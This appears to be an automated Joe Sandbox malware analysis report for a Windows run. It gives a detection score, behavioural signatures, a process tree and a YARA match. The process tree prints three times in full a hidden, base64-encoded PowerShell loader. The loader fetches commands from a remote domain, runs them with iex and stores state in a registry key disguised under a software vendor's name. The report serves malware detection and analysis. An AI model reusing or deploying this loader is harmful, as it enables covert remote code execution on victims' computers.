Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:651250
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to call native functions
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • cmd.exe (PID: 2372 cmdline: cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • cmd.exe (PID: 1436 cmdline: cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA==" MD5: AD7B9C14083B52BC532FBA5948342B98)
      • powershell.exe (PID: 1168 cmdline: powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA==" MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x25e2:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
